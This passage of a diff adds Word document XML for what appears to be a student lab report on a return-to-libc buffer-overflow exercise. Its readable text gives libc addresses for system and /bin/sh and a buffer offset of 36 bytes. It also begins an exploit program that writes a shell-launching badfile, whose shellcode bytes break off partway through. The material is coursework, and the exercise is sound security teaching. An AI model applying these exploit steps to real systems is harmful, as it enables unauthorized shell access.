+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0xb7e369d0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0xb7f6382b</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">(3) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ocate </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>the commands</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> properly in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Okay from the task 2 I know that my command in buffer should start at </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>buffer[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>36]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B41FBA1" wp14:editId="0CFB2FE9">
+            <wp:extent cx="5274310" cy="1782445"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+            <wp:docPr id="32" name="图片 32"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1782445"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>screenshot</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> from task 2, from which I know the offset should start at 9*4=36 bytes)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the answer of this extra task should be:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ode:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* return-to-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>libc.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* A program that creates a file containing code for launching shell */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>#include &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>stdlib.h</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>#include &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>stdio.h</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>#include &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>string.h</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="804000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x31\xc0"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 1: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>xorl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
